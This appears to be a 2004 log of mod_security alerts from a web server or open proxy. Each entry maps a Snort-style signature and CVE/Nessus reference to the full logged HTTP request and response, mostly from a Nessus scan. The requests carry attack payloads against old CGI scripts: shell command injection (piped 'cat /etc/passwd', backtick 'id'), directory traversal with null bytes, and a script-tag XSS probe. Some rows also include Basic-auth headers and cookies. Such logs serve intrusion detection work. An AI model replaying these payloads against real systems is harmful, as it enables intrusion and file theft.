1511 | CVE-1999-0947 Nessus 10016 | web-application-activity | WEB-CGI test.bat access | Request: 217.160.165.173 - - [Fri Mar 12 22:37:35 2004] "GET /test.bat?|type%20c:\winnt\win.ini HTTP/1.1" 404 288 Handler: (null) Error: mod_security: Warning. Pattern match "/test\.bat" at THE_REQUEST. ---------------------------------------- GET /test.bat?|type%20c:\winnt\win.ini HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "\.bat\?" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1513 | CVE-1999-0947 Nessus 10016 | web-application-activity | WEB-CGI input.bat access | Request: 217.160.165.173 - - [Fri Mar 12 22:37:36 2004] "GET /input.bat?|type%20c:\winnt\win.ini HTTP/1.1" 404 289 Handler: (null) Error: mod_security: Warning. Pattern match "/input\.bat" at THE_REQUEST. ---------------------------------------- GET /input.bat?|type%20c:\winnt\win.ini HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "\.bat\?" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=98 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1515 | CVE-1999-0947 Nessus 10016 | web-application-activity | WEB-CGI input2.bat access | Request: 217.160.165.173 - - [Fri Mar 12 22:37:37 2004] "GET /input2.bat?|type%20c:\winnt\win.ini HTTP/1.1" 404 290 Handler: (null) Error: mod_security: Warning. Pattern match "/input2\.bat" at THE_REQUEST. ---------------------------------------- GET /input2.bat?|type%20c:\winnt\win.ini HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "\.bat\?" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=96 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1517 | CVE-1999-0947 Nessus 10016 | web-application-activity | WEB-CGI envout.bat access | Request: 217.160.165.173 - - [Fri Mar 12 22:37:38 2004] "GET /ssi/envout.bat?|type%20c:\winnt\win.ini HTTP/1.1" 404 294 Handler: (null) Error: mod_security: Warning. Pattern match "/envout\.bat" at THE_REQUEST. ---------------------------------------- GET /ssi/envout.bat?|type%20c:\winnt\win.ini HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "\.bat\?" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=94 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1518 | | web-application-activity | WEB-MISC nstelemetry.adp access | Request: 217.160.165.173 - - [Fri Mar 12 22:31:41 2004] "GET /nstelemetry.adp HTTP/1.0" 200 566 Handler: (null) Error: mod_security: pausing [/nstelemetry.adp] for 50000 ms ---------------------------------------- GET /nstelemetry.adp HTTP/1.0 Authorization: Basic bnNhZG1pbjp4 mod_security-message: Access denied with code 200. Pattern match "Basic" at HEADER. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1 |
1520 | apache | web-application-activity | WEB-MISC server-info access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:08 2004] "GET /server-info HTTP/1.1" 404 291 Handler: (null) Error: mod_security: Warning. Pattern match "/server-info" at THE_REQUEST. ---------------------------------------- GET /server-info HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/server-info" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1521 | apache | web-application-activity | WEB-MISC server-status access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:24 2004] "GET /server-status HTTP/1.1" 403 297 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/server-status ---------------------------------------- GET /server-status HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1525 | CAN-2000-0191 | web-application-activity | WEB-MISC Axis Storpoint CD access | Request: 217.160.165.173 - - [Fri Mar 12 22:42:57 2004] "GET /config/html/cnf_gi.htm HTTP/1.1" 404 302 Handler: (null) Error: mod_security: Warning. Pattern match "/config/html/cnf_gi\.htm" at THE_REQUEST. ---------------------------------------- GET /config/html/cnf_gi.htm HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/config/html/cnf_gi\.htm" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1526 | CAN-2001-1044 Nessus 10601 | web-application-activity | WEB-MISC basilix sendmail.inc access | Request: 217.160.165.173 - - [Fri Mar 12 22:42:01 2004] "GET /inc/sendmail.inc HTTP/1.1" 404 296 Handler: (null) Error: mod_security: Warning. Pattern match "/inc/sendmail\.inc" at THE_REQUEST. ---------------------------------------- GET /inc/sendmail.inc HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/inc/sendmail\.inc" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1527 | CAN-2001-1044 Nessus 10601 | web-application-activity | WEB-MISC basilix mysql.class access | Request: 217.160.165.173 - - [Fri Mar 12 22:42:01 2004] "GET /class/mysql.class HTTP/1.1" 404 297 Handler: (null) Error: mod_security: Warning. Pattern match "/class/mysql\.class" at THE_REQUEST. ---------------------------------------- GET /class/mysql.class HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/class/mysql\.class" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1528 | CAN-2000-0629 Nessus 10507 | web-application-activity | WEB-MISC BBoard access | Request: 217.160.165.173 - - [Fri Mar 12 22:42:49 2004] "GET /servlet/sunexamples.BBoardServlet HTTP/1.1" 404 313 Handler: (null) Error: mod_security: Warning. Pattern match "/servlet/sunexamples\.BBoardServlet" at THE_REQUEST. ---------------------------------------- GET /servlet/sunexamples.BBoardServlet HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/servlet/sunexamples\.BBoardServlet" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1531 | BID142 CAN-1999-1462 Nessus 10025 | web-application-attack | WEB-CGI bb-hist.sh attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:42:23 2004] "GET /cgi-bin/bb-hist.sh?HISTFILE=../../../../../etc/passwd HTTP/1.1" 403 302 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/bb-hist.sh ---------------------------------------- GET /cgi-bin/bb-hist.sh?HISTFILE=../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1533 | CVE-2000-0638 Nessus 10460 | web-application-activity | WEB-CGI bb-hostscv.sh access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:26 2004] "GET /bb-hostsvc.sh?HOSTSVC=../../../../../etc/passwd HTTP/1.1" 403 297 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/bb-hostsvc.sh ---------------------------------------- GET /bb-hostsvc.sh?HOSTSVC=../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1534 | BID3976 CAN-2001-1199 Nessus 10836 | web-application-attack | WEB-CGI agora.cgi attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:46:43 2004] "GET /store/agora.cgi?cart_id=<SCRIPT>alert(document.domain)</SCRIPT>&xm=on&product=HTML HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/store/agora.cgi] for 50000 ms ---------------------------------------- GET /store/agora.cgi?cart_id=<SCRIPT>alert(document.domain)</SCRIPT>&xm=on&product=HTML HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "<[[:space:]]*script" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1535 | BID1104 CAN-2000-0287 | web-application-activity | WEB-CGI bizdbsearch access | Request: 217.160.165.173 - - [Fri Mar 12 22:41:58 2004] "GET /cgi-bin/bizdb1-search.cgi HTTP/1.1" 404 305 Handler: cgi-script Error: mod_security: Warning. Pattern match "/bizdb1-search\.cgi" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/bizdb1-search.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/bizdb1-search\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1537 | CVE-2000-0432 | web-application-activity | WEB-CGI calendar_admin.pl access | Request: 217.160.165.173 - - [Fri Mar 12 22:39:01 2004] "GET /cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd| HTTP/1.1" 403 309 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/calendar_admin.pl ---------------------------------------- GET /cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd| HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1539 | BID936 CAN-2000-0079 | web-application-activity | WEB-CGI /cgi-bin/ls access | Request: 66.230.236.14 - - [Thu Mar 11 07:12:23 2004] "GET http://www.shitforyou.com/cgi-bin/lspro/lspro.cgi?click={TRADE:ID} HTTP/1.1" 302 237 Handler: proxy-server Error: mod_security: Warning. Pattern match "/cgi-bin/ls" at THE_REQUEST. ---------------------------------------- GET http://www.shitforyou.com/cgi-bin/lspro/lspro.cgi?click={TRADE:ID} HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate Accept-Language: en Host: www.shitforyou.com Pragma: no-cache Referer: http://pissing.around-you.com/ User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) mod_security-message: Warning. Pattern match "/cgi-bin/ls" at THE_REQUEST. HTTP/1.1 302 Found Location: http://www.shitforyou.com/topsites/index.html Content-Type: text/html; charset=iso-8859-1 X-Cache: MISS from www.testproxy.net Transfer-Encoding: chunked |
1540 | | web-application-activity | WEB-COLDFUSION ?Mode=debug attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:38:01 2004] "GET /?Mode=debug HTTP/1.1" 200 4320 Handler: (null) Error: mod_security: Warning. Pattern match "Mode=debug" at THE_REQUEST. ---------------------------------------- GET /?Mode=debug HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "Mode=debug" at THE_REQUEST. HTTP/1.1 200 OK Warning: Subject to Monitoring Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html |
1542 | CVE-2000-0726 | web-application-activity | WEB-CGI cgimail access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:47 2004] "GET /cgi-bin/cgimail.exe HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/cgimail.exe ---------------------------------------- GET /cgi-bin/cgimail.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1543 | CVE-2001-0987 CVE-2000-0431 CVE-1999-1530 Nessus 10041 | web-application-activity | WEB-CGI cgiwrap access | Request: 217.160.165.173 - - [Fri Mar 12 22:39:52 2004] "GET /cgi-bin/cgiwrap HTTP/1.1" 404 295 Handler: cgi-script Error: mod_security: Warning. Pattern match "/cgiwrap" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/cgiwrap HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/cgiwrap" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1544 | CAN-2000-0945 | web-application-activity | WEB-MISC Cisco Catalyst command execution attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:30:27 2004] "GET /exec/show/config/cr HTTP/1.1" 403 303 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/exec ---------------------------------------- GET /exec/show/config/cr HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1547 | CAN-2002-0495 Nessus 10924 BID4368 | web-application-attack | WEB-CGI csSearch.cgi arbitrary command execution attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:42:48 2004] "GET /cgi-bin/csSearch.cgi?command=savesetup&setup=print%20`id` HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/csSearch.cgi ---------------------------------------- GET /cgi-bin/csSearch.cgi?command=savesetup&setup=print%20`id` HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1551 | | web-application-activity | WEB-MISC /CVS/Entries access | Request: 217.160.165.173 - - [Fri Mar 12 22:30:22 2004] "GET /CVS/Entries HTTP/1.1" 404 291 Handler: (null) Error: mod_security: Warning. Pattern match "/CVS/Entries" at THE_REQUEST. ---------------------------------------- GET /CVS/Entries HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/CVS/Entries" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1553 | CVE-2000-0252 | web-application-activity | WEB-CGI /cart/cart.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:43:04 2004] "GET /cart/cart.cgi HTTP/1.1" 404 293 Handler: (null) Error: mod_security: Warning. Pattern match "/cart/cart\.cgi" at THE_REQUEST. ---------------------------------------- GET /cart/cart.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/cart\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1554 | Nessus 10403 CVE-2000-0381 | web-application-activity | WEB-CGI dbman db.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:30:35 2004] "GET /scripts/dbman/db.cgi?db=no-db HTTP/1.1" 404 300 Handler: (null) Error: mod_security: Warning. Pattern match "/dbman/db\.cgi" at THE_REQUEST. ---------------------------------------- GET /scripts/dbman/db.cgi?db=no-db HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/dbman/db\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1555 | CAN-2001-0821 | web-application-activity | WEB-CGI DCShop access | Request: 217.160.165.173 - - [Fri Mar 12 22:36:50 2004] "GET /cgi-bin/dcshop.pl HTTP/1.1" 404 297 Handler: cgi-script Error: mod_security: Warning. Pattern match "/dcshop" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/dcshop.pl HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/dcshop" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1560 | BID318 CVE-1999-0678 | web-application-activity | WEB-MISC /doc/ access | Request: 195.161.118.212 - - [Thu Mar 11 11:41:05 2004] "GET http://top.list.ru/counter?id=651568;t=70;js=13;r=http%3A//1ps.ru/pr/doc/cost.php%20;j=true;s=1024*768;d=32;rand=0.939666307230189 HTTP/1.1" 200 887 Handler: proxy-server Error: mod_security: Warning. Pattern match "/doc/" at THE_REQUEST. ---------------------------------------- GET http://top.list.ru/counter?id=651568;t=70;js=13;r=http%3A//1ps.ru/pr/doc/cost.php%20;j=true;s=1024*768;d=32;rand=0.939666307230189 HTTP/1.1 Connection: close Cookie: VID=0xh0if1IiiW1 Cookie2: $Version="1" Host: top.list.ru Referer: http://www.handwatch.ru User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; w20010828) mod_security-message: Warning. Pattern match "/doc/" at THE_REQUEST. HTTP/1.1 200 OK Content-Type: image/gif Accept-Ranges: bytes Content-Length: 887 Expires: Thu, 11 Dec 2003 21:00:00 GMT Pragma: no-cache Cache-control: no-cache X-Cache: MISS from www.testproxy.net Connection: close |
1561 | | web-application-activity | WEB-MISC ?open access | Request: 218.22.141.172 - - [Sat Mar 13 11:32:52 2004] "GET http://estore.sjf.com/sjf.nsf/homepage?openform&amp;amp;GTSE=bfox&amp;amp;GTKW=%keyword% HTTP/1.0" 200 566 Handler: proxy-server Error: mod_security: Invalid URL encoding #2 detected. ---------------------------------------- GET http://estore.sjf.com/sjf.nsf/homepage?openform&amp;amp;GTSE=bfox&amp;amp;GTKW=%keyword% HTTP/1.0 Accept: text/html, image/jpeg, image/gif, image/x-xbitmap, */* Accept-Language: fr Cookie: PPC20=abee7fa35819f0c216d8fc95c0162a1c; path=/PPC_USER_ID=73122a3500ef8a71139332c013bda500; expires=Fri, 01-Jan-10 08:00:00 GMT Host: estore.sjf.com Pragma: no-cache Referer: http://www.paid2find.com//search.php?format=HTML&affiliateID=181&str=industrial%2Bequipment User-Agent: Mozilla/4.0 (compatible; MSIE 5.01 Windows NT 5.1) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1 |
1564 | CAN-1999-1533 | web-application-activity | WEB-MISC login.htm access | Request: 68.82.168.149 - - [Thu Mar 11 21:26:36 2004] "GET http://www.jj1.com/login.html HTTP/1.0" 200 566 Handler: proxy-server Error: mod_security: pausing [http://www.jj1.com/login.html] for 50000 ms ---------------------------------------- GET http://www.jj1.com/login.html HTTP/1.0 Accept: */* Accept-Language: en-us,en;q=0.5 Authorization: Basic amR1YmkzMTpzYW11cmFp Host: www.jj1.com Pragma: no-cache Referer: http://www.jj1.com/login.html User-Agent: Mozilla/4.0 ( compatible; MSIE 5.5; Windows XP; DigiExt ) mod_security-message: Access denied with code 200. Pattern match "Basic" at HEADER. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1 |
1566 | CAN-2001-1014 | web-application-activity | WEB-CGI eshop.pl access | Request: 217.160.165.173 - - [Fri Mar 12 22:39:49 2004] "GET /cgi-local/eshop.pl/seite=;cat%20eshop.pl| HTTP/1.1" 404 319 Handler: (null) Error: mod_security: Warning. Pattern match "/eshop\.pl" at THE_REQUEST. ---------------------------------------- GET /cgi-local/eshop.pl/seite=;cat%20eshop.pl| HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/eshop\.pl" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1570 | | web-application-activity | WEB-CGI loadpage.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:42:42 2004] "GET /cgi-bin/loadpage.cgi HTTP/1.1" 404 300 Handler: cgi-script Error: mod_security: Warning. Pattern match "/loadpage\.cgi" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/loadpage.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/loadpage\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1571 | CAN-2001-0436 | web-application-attack | WEB-CGI dcforum.cgi directory traversal attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:37:13 2004] "GET /dcforum/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd%00 HTTP/1.1" 200 578 Handler: (null) Error: mod_security: Invalid character detected [0] ---------------------------------------- GET /dcforum/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1572 | CAN-2001-0210 BID2361 Nessus 10612 | attempted-recon | WEB-CGI commerce.cgi arbitrary file access attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:39:02 2004] "GET /cgi-bin/commerce.cgi?page=../../../../../etc/passwd%00index.html HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/commerce.cgi ---------------------------------------- GET /cgi-bin/commerce.cgi?page=../../../../../etc/passwd%00index.html HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1573 | CVE-2000-1171 BID1963 Nessus 10552 | web-application-attack | WEB-CGI cgiforum.pl attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:41:39 2004] "GET /cgi-bin/cgiforum.pl?thesection=../../../../../../../../etc/passwd%00 HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [0] ---------------------------------------- GET /cgi-bin/cgiforum.pl?thesection=../../../../../../../../etc/passwd%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
